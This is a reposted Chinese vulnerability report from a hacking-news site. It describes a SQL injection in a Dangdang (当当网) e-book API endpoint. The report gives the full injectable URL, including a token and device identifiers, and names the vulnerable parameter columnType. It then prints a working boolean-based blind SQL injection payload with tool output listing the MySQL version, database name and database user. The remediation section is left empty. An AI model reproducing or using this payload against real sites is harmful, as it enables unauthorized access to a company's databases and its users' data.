记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

当当网某处SQL注入

2016-04-23 10:20

注入点

http://e.dangdang.com/media/api2.go?deviceSerialNo=8D47C214-7A36-465C-B722-F6D35E578467&clientOs=iPhone%2520OS7.1.1&columnType=all_aa*&platform=2&deviceType=iphone&isFull=1&channelId=10020&clientVersionNo=5.5.0&returnType=json&end=20&serverVersionNo=1.0&token=0d50506475bcaea555e6c0d9e933115e&macAddr=020000000000&orderSource=30000&fromPlatform=101&action=column&platformSource=DDDS-P&permanentId=20160416115048424116807875249950073&resolution=640x960&start=0



注入参数 columnType

屏幕快照 2016-04-16 12.08.58.png



漏洞证明:

6个数据库

code 区域
---

Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://e.dangdang.com:80/media/api2.go?deviceSerialNo=8D47C214-7A36-465C-B722-F6D35E578467&clientOs=iPhone%20OS7.1.1&columnType=all_aa' AND 2458=2458 AND 'LCQm'='LCQm&platform=2&deviceType=iphone&isFull=1&channelId=10020&clientVersionNo=5.5.0&returnType=json&end=20&serverVersionNo=1.0&token=0d50506475bcaea555e6c0d9e933115e&macAddr=020000000000&orderSource=30000&fromPlatform=101&action=column&platformSource=DDDS-P&permanentId=20160416115048424116807875249950073&resolution=640x960&start=0

---

back-end DBMS: MySQL >= 5.0.0

current database: 'digital'

current user: 'reader@%'

修复方案:

。。。

知识来源: www.wooyun.org/bugs/wooyun-2016-0196960

阅读:74832 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“当当网某处SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云